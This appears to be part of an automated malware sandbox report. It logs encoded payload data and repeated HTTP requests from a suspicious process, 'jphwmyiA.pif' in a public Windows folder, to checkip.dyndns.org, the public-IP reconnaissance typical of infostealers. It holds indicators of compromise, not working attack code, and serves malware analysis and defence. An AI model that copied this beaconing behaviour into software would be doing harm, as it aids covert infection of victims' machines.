                                                                                                                                          Data Raw: 37 6b 4a 35 67 6a 48 77 71 47 59 5a 50 67 6e 54 43 58 5a 43 38 4f 64 59 38 69 64 75 79 67 6e 52 54 76 63 64 67 64 67 49 43 37 6c 43 47 2f 6d 53 75 2f 71 37 4c 52 30 6b 4a 4a 43 7a 42 61 34 77 46 65 2b 6b 73 76 79 36 51 52 45 6d 4a 70 75 38 2b 61 67 74 4a 65 71 74 6d 46 65 56 43 45 4e 68 72 36 52 4f 70 42 30 33 59 72 75 4d 55 6f 34 67 4b 30 36 75 69 31 32 51 48 6a 4e 59 71 61 5a 59 6b 2f 56 49 51 2b 52 34 52 6f 62 73 56 43 76 6c 63 44 52 38 36 6c 49 33 31 6d 68 42 62 66 64 4e 79 54 55 59 56 48 75 68 78 6b 72 42 55 59 68 5a 34 6f 4b 52 38 32 65 4c 57 44 59 58 41 51 78 67 42 4d 50 48 79 49 41 45 54 32 77 72 72 64 52 30 42 31 4f 42 4f 37 4b 39 35 44 35 65 66 54 44 69 62 5a 49 77 54 33 39 36 4f 64 35 35 64 4b 45 36 46 64 6c 52 71 4b 57 6a 38 45 76 4b 58 36 6d 58 6b 31 51 46 66 45 43 7a 34 4e 67 31 2f 62 41 46 78 74 48 4a 51 51 4b 30 41 64 62 58 70 34 46 55 49 64 6e 30 65 4f 5a 31 54 68 48 67 43 34 2b 72 6d 43 51 6b 58 4f 58 31 61 4b 2f 4e 4b 31 37 6d 2b 34 54 48 74 62 5a 43 59 34 6c 57 6d 4d 6d 38 4c 68 [TRUNCATED]
                                                                                                                                          Data Ascii: 7kJ5gjHwqGYZPgnTCXZC8OdY8iduygnRTvcdgdgIC7lCG/mSu/q7LR0kJJCzBa4wFe+ksvy6QREmJpu8+agtJeqtmFeVCENhr6ROpB03YruMUo4gK06ui12QHjNYqaZYk/VIQ+R4RobsVCvlcDR86lI31mhBbfdNyTUYVHuhxkrBUYhZ4oKR82eLWDYXAQxgBMPHyIAET2wrrdR0B1OBO7K95D5efTDibZIwT396Od55dKE6FdlRqKWj8EvKX6mXk1QFfECz4Ng1/bAFxtHJQQK0AdbXp4FUIdn0eOZ1ThHgC4+rmCQkXOX1aK/NK17m+4THtbZCY4lWmMm8Lh3dSKTlFZ67/331TvVxywG0OWYHbOf8wD5SQtXCEdEoIuzWxA67Xe8UxZtk3y8gIW/JW8sqDA+EzliSDyQk96HVIeEZ7/7AeS1vOSX11YpfXoQBZvLYnklo/VfupaxBnBpTNN3FMIMCLlax5SYkyxpWOKiYTeIdWzc2rItO0E8BXNOCZZ0j9HT0VoREt+WvZ0ekSsabmoNiMKNlvJ+HZ/OpMOWHchRA506tnIj6V84gpW54IVGTYqCHgRxaj16bv8v4M2ppTtDRamUj0/+B4IUSOq8NmtrZxEw319Ahp9rEVCt4QGnIyb06J9RInN++LyYkzFvnftlZ/OcelWjIW+zTIJN4iQYXt+A+JiQl+s61EuArEfDWhSysUv/yjLAurEvw9ZGtR3oEDgeN2R/ZH/Drld0n0x5FXISs8cpX+FqGq/PeY/tmtI8imSdVN9/HMZsIU0bdr/G6+zVKynwxxuoxTdVyNLQ5EUHNfVmbJf9Kz4FgihDrFm+nMmsORWNyoD11ED1VddIMmNVtbQo1ui3McYULPagkJH6ZlJbwR2hBaNALai3LHoGtv2fz32TZCu2Kx5dk2sPepb2WBIrXzSsH5uu
                                                                                                                                          Jan 6, 2025 07:54:05.433360100 CET1236INData Raw: 64 74 4b 58 30 49 4e 66 44 47 4e 32 54 2b 6a 65 6e 4b 64 6c 71 77 50 64 4a 64 44 54 65 6e 5a 41 6c 52 36 76 75 78 5a 64 33 48 70 42 6b 36 57 79 6b 61 52 78 53 69 31 50 46 77 6e 41 76 32 79 76 59 4f 49 68 71 65 67 4d 2b 67 30 58 49 70 59 6f 46 55
                                                                                                                                          Data Ascii: dtKX0INfDGN2T+jenKdlqwPdJdDTenZAlR6vuxZd3HpBk6WykaRxSi1PFwnAv2yvYOIhqegM+g0XIpYoFUIlb0HuN6l0phSViOqV4M3gsCgKWrS23OiYk9cS3S3oYQy+3cht9JiQpPbJ8VZgQQ2GqoGeUJCaTas/nQ90UUSvXo2V57O9LTObKKXBJ+PmQ2yXdKwzqi7j7xUIZAT0JGW3xXEPmaTXj+PIfdcMA2yr3IGvlEdZPBx
                                                                                                                                          Jan 6, 2025 07:54:05.433372974 CET1236INData Raw: 32 32 68 4f 79 4d 41 67 4f 6a 73 59 4d 30 31 50 77 4a 69 53 59 72 67 71 33 50 68 41 53 62 6f 74 4a 79 55 77 56 45 36 4f 79 38 4c 74 6b 2f 2f 4f 67 75 45 6a 62 4b 41 72 71 6d 64 72 35 71 32 59 54 49 30 62 77 74 77 69 6b 77 4c 63 34 49 62 77 43 78
                                                                                                                                          Data Ascii: 22hOyMAgOjsYM01PwJiSYrgq3PhASbotJyUwVE6Oy8Ltk//OguEjbKArqmdr5q2YTI0bwtwikwLc4IbwCxbyeXjrF+GvPuWLzHOGWy984Hdv3fLLmUwatD23Y3jT+0Rx4ecGyKiQmtBVt0MVBIq3qkM6oBVB7LbiXbgVdoTnOhYrzMmhgsJqABiimR4DFhmdGlkncl3gdLoles451ClqcYrq5posNU3I4sLGnlA9TkSngjx7kv/
                                                                                                                                          Jan 6, 2025 07:54:05.433382988 CET672INData Raw: 71 39 4a 74 2b 37 32 46 79 57 39 6d 68 66 43 51 6b 59 71 55 39 76 33 42 39 42 6a 36 4e 55 4b 32 75 63 6d 6e 75 52 61 61 54 45 69 74 4b 33 32 35 61 6f 77 73 2f 4e 39 65 5a 54 35 59 50 55 6b 72 6c 6c 55 39 34 49 79 68 6d 78 4a 4e 68 67 69 64 51 59
                                                                                                                                          Data Ascii: q9Jt+72FyW9mhfCQkYqU9v3B9Bj6NUK2ucmnuRaaTEitK325aows/N9eZT5YPUkrllU94IyhmxJNhgidQYMyESW/yLEzAfDOTGEth2XIogA30U4TOOcogNFTBjVRAn1kYa8gnuTwGJX/WJCR3LBUBigzbhlJLG+XgJ8tYBfF3qha7MRMfxbzwzScmJBCWqwS2Wh7+xMUexV8QEaeT+LMqxncyFNYWlOfjKRfIHm210U8R1Bh3or
                                                                                                                                          Jan 6, 2025 07:54:05.433396101 CET1236INData Raw: 79 61 78 4a 5a 69 54 43 2b 62 6f 7a 2b 5a 6e 64 57 72 49 4a 38 2f 44 61 58 56 4c 6d 45 68 67 62 78 67 7a 69 39 6d 33 6b 43 55 49 55 4b 33 6e 4e 78 4a 69 52 4a 64 6b 62 6d 6c 61 63 51 6b 55 79 49 2f 55 51 73 35 49 30 31 64 2f 74 6d 52 4d 68 38 4b
                                                                                                                                          Data Ascii: yaxJZiTC+boz+ZndWrIJ8/DaXVLmEhgbxgzi9m3kCUIUK3nNxJiRJdkbmlacQkUyI/UQs5I01d/tmRMh8KGjsSynRT45SzSHwy542khE2TdLZNWgJL2F+hTyY8D8vr4lDcR9TIuaGV28GTDvRzCO2WBInj8Uerk8WUHnhGNlZGwN6d+uuWO33a8z9ze0LDYTPDspV769lmF3mODv/95XIGb4kJhgkJIXTI5Y/ISCOv+ANbbPbOw
                                                                                                                                          Jan 6, 2025 07:54:05.433404922 CET224INData Raw: 65 38 67 4c 36 4c 38 38 53 56 39 65 32 76 47 34 45 73 70 41 43 47 2f 59 72 7a 65 6b 76 4c 4f 61 34 2f 32 7a 6c 49 52 54 4b 49 4d 32 54 38 38 74 72 43 78 59 4e 5a 37 73 66 4e 4f 4c 6d 33 6e 59 48 75 6e 2f 49 44 74 42 59 32 68 4d 2f 7a 37 57 78 71
                                                                                                                                          Data Ascii: e8gL6L88SV9e2vG4EspACG/YrzekvLOa4/2zlIRTKIM2T88trCxYNZ7sfNOLm3nYHun/IDtBY2hM/z7WxqSC4oQ747Cms9EzBt8aTDvuWvOplOhYCLretxY8ZjsJXYE8bd2HynJiTyEKcsylKNyBGUQugjqW0LpWoN0hT8pEzLXB9eeNlbcpCND/3lzwQfahs+GE34h9Ca+1VNeRRmmcYckrqkKKH20W
                                                                                                                                          Jan 6, 2025 07:54:05.433660030 CET1236INData Raw: 54 34 30 68 41 54 67 43 46 53 67 42 34 6d 61 66 54 57 35 76 47 57 7a 56 57 56 35 46 72 44 30 4e 38 31 37 47 62 64 6e 38 37 47 54 68 59 6e 68 55 67 6d 57 6d 58 71 72 68 78 76 43 73 74 4b 2f 71 56 4f 68 69 48 35 63 2b 51 38 65 64 76 47 68 49 4b 41
                                                                                                                                          Data Ascii: T40hATgCFSgB4mafTW5vGWzVWV5FrD0N817Gbdn87GThYnhUgmWmXqrhxvCstK/qVOhiH5c+Q8edvGhIKAcHmM9PR343/ynkQHh1MsxI/yuZ8lQTCa+wEBlzjO174rex2LrBnBgzzMuAfTIu2q3waw4r4AtyX8uN+HAn1Z9wTddbB0Z7txXFYGxFg4A4x2MvOhvHJkfHpRCgf6aK2lbg5F5KNT+lIR3/v7raWsdMcAmhpw/FjHn
                                                                                                                                          Jan 6, 2025 07:54:05.433671951 CET1236INData Raw: 61 31 35 58 47 47 43 59 6d 34 5a 38 4c 54 4c 5a 64 65 58 47 49 54 6c 7a 62 6f 50 32 5a 6c 68 61 68 4d 4d 6a 31 50 34 33 79 63 62 67 33 74 54 55 67 76 6c 59 59 56 41 72 55 4b 51 6b 71 6d 38 65 65 6a 49 76 47 6b 48 4b 32 36 6d 76 31 6f 50 43 30 67
                                                                                                                                          Data Ascii: a15XGGCYm4Z8LTLZdeXGITlzboP2ZlhahMMj1P43ycbg3tTUgvlYYVArUKQkqm8eejIvGkHK26mv1oPC0gx/0S+KkNA9UR3W3kZRP6h5F7vpA7LiWECVAQRGM7CYktF2r973c5r9BFFzuacRoWGbbmPS1a6rtY9XkEsUoFmTufLGL6RzXQtNTyCMSz5K2IwtH1nIYbqx6QOpUI2k+MED62U4P8DaCazu1WxXeIM6vS/FwrRi9+C
                                                                                                                                          Jan 6, 2025 07:54:05.433685064 CET448INData Raw: 42 56 6a 77 37 35 78 33 6d 50 4a 42 72 69 77 58 70 4e 4b 50 46 30 53 65 48 75 6b 69 66 66 47 48 64 73 59 30 7a 46 4f 37 32 36 6a 59 6a 51 5a 76 33 42 32 50 39 69 64 70 78 6f 78 66 34 51 59 31 2b 39 57 33 68 45 68 61 37 31 38 79 39 64 67 63 5a 78
                                                                                                                                          Data Ascii: BVjw75x3mPJBriwXpNKPF0SeHukiffGHdsY0zFO726jYjQZv3B2P9idpxoxf4QY1+9W3hEha718y9dgcZxaGpXrJR2AkPU+psb7YJJCR/GGOrLX9oLhto9uukkc+j0og8IwgdxcBx9hHCvbhxJiS5pJy/KrPJdOLBsCGhgPm2EKKIhnpoa+c2Lqj5MMt/BNoeDmlFuBdrwyeaTkszLG4BsEUVphkIGvSHbBCDT9ICzGW6P447tO
                                                                                                                                          Jan 6, 2025 07:54:05.433696032 CET1236INData Raw: 2b 5a 6e 31 4d 56 50 4a 31 6b 79 68 37 34 51 71 54 36 74 35 4d 76 70 69 49 58 63 67 4e 67 4c 76 69 6a 53 4f 30 56 4e 62 50 45 57 4d 76 78 50 7a 53 6a 32 6f 6e 59 34 68 69 61 58 73 6e 66 46 4d 43 6b 37 39 5a 31 50 6a 48 70 67 31 30 54 73 5a 44 35
                                                                                                                                          Data Ascii: +Zn1MVPJ1kyh74QqT6t5MvpiIXcgNgLvijSO0VNbPEWMvxPzSj2onY4hiaXsnfFMCk79Z1PjHpg10TsZD5PDXfCux5VbyCxoEJRbFWD2HSYZe1GIyvCIyVOHHAMTFqO2284Xz2J1NDVKTKrp0wFHgXE1jBP4he7yX6ZKpu8UmJISziWsh4YnpZ4ACrrIAWMvTJWWI8QwNoaB2bO81lSgsXyqNStZQDAkNLkCdc8SMLIySDN1tbZ
                                                                                                                                          Jan 6, 2025 07:54:05.438313007 CET1236INData Raw: 41 6f 64 75 7a 54 64 35 54 36 57 6b 48 55 35 56 72 4a 43 59 4b 78 79 4d 55 33 4f 5a 46 55 72 33 77 2b 54 49 34 71 6e 6e 58 4c 2b 5a 54 77 72 52 4c 5a 47 63 55 44 4b 34 4b 49 70 57 5a 62 35 33 35 34 41 36 41 79 63 51 68 46 42 2b 63 37 50 6e 32 6e
                                                                                                                                          Data Ascii: AoduzTd5T6WkHU5VrJCYKxyMU3OZFUr3w+TI4qnnXL+ZTwrRLZGcUDK4KIpWZb5354A6AycQhFB+c7Pn2nQR/UY6Yuf/fa9JX+FKo0VNXstmzVEpWE5Y8Hkpelsy7wiQkxe9tOu+jK0FCPrLP1ZFIGQdbTu9FGYQqpK7DkI+O95AxEHSi3SvlEBhAeCjAGqftj9/XPfeXGOe51bxUeuwSo/QQNqs+4MJEcOE8b6dUJCYBBG1QoW


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.549723132.226.8.169807208C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:10.990698099 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 6, 2025 07:54:11.775665998 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:11 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                          Jan 6, 2025 07:54:11.818860054 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:12.103647947 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:11 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                          Jan 6, 2025 07:54:13.717377901 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:13.988286972 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:13 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          3192.168.2.549731132.226.8.169807208C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:14.624490023 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:15.370594025 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:15 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          4192.168.2.549736132.226.8.169807208C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:15.988140106 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:16.802356958 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:16 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          5192.168.2.553584132.226.8.169807208C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:17.503892899 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:18.455593109 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:18 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          6192.168.2.553597132.226.8.169807208C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:19.068025112 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 6, 2025 07:54:19.847596884 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:19 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          7192.168.2.553606132.226.8.169807208C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:20.643907070 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 6, 2025 07:54:21.500524044 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:21 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          8192.168.2.553618132.226.8.169807208C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:22.127638102 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 6, 2025 07:54:22.889813900 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:22 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          9192.168.2.553623132.226.8.169807820C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:22.610833883 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 6, 2025 07:54:23.538500071 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:23 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                          Jan 6, 2025 07:54:23.569864988 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:23.837054014 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:23 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                          Jan 6, 2025 07:54:24.859649897 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:25.127861023 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:25 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


